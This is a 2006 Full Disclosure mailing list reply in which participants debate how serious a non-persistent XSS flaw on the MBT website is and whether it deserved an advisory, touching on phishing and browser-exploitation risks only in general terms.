Full Disclosure mailing list archives

Re: MBT Xss vulnerability

From: Stan Bubrouski <stan.bubrouski () gmail com>
Date: Fri, 20 Jan 2006 16:57:17 -0500

On 1/20/06, Morning Wood <se_cur_ity () hotmail com> wrote:


in all honesty, XSS is a serious vector of attack.
however, non-persistant XSS is a much less serious problem
than is persistant XSS. Generally XSS is of no harm to the server
side anyway. It can however be leveraged as the OP said, but
would require  a dedicated, pre-formed url string that needs to
be presented to the user to be effective. IMHO the OP advisory
should not have been posted, because of the non-persistant nature
of the flaw at one dedicated site.


Unless that site is trusted by hundreds of thousands or millions of
people, then something minor can be made to be much more serious.  For
instance, in this case someone could create a form for phishing
purposes that looks like a job application and mail it to millions of
people who think that its from MBT.


 Issues comes into play via persistant XSS, which is script that may
be embedded in a web application, such as a guestbook, or comment
section, where people would travel to on their own without the need of
a direct link and then rendered upon visitation in the users browser.
Further, in todays world of browser exploitation, cookie, session,
and/or credential theft is not the only thing to be gained and is often
of minor importance and information. What is bad is leveraging XSS
as a vector for browser exploitation ( can we say IFRAME+WMF ),
so you have a way, via XSS to COMPROMISE end users systems.

While the OP does have a valid initial point and theory,
1. it is not persistant in nature
2. it is one site, and not a script used on many sites


Yes thats what I was thinking, but apparently a lot of people use it,
at least thats the gist I got.

3. it does require SE at some level to be effective
4. it should not have been posted to FD ( see points 1,2,3 )


This was my concern in previous replies.  Why should XSS on one site
be posted here, but as the list maintainer stated previously XSS in
big sites like Google or Yahoo is pertinent to this list due to the
large number of people they can affect.  Assuming the author is
correct about it possibly affecting millions of people then its
relevence to this list is clearly satisfied.

-sb



my2bits,
MW

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

MBT Xss vulnerability MuNNa (Jan 19)
- Re: MBT Xss vulnerability Native.Code (Jan 19)
  - Re: MBT Xss vulnerability greybrimstone (Jan 19)
    - Re: MBT Xss vulnerability MuNNa (Jan 20)
    - Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)
    - Re: MBT Xss vulnerability MuNNa (Jan 20)
    - Re: MBT Xss vulnerability Morning Wood (Jan 20)
    - Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)
    - Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)
    - Re: MBT Xss vulnerability MuNNa (Jan 21)
    - Re: MBT Xss vulnerability Native.Code (Jan 22)
  - Re: MBT Xss vulnerability Jerome Athias (Jan 20)
    - Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)
    - Re: MBT Xss vulnerability Stan Bubrouski (Jan 20)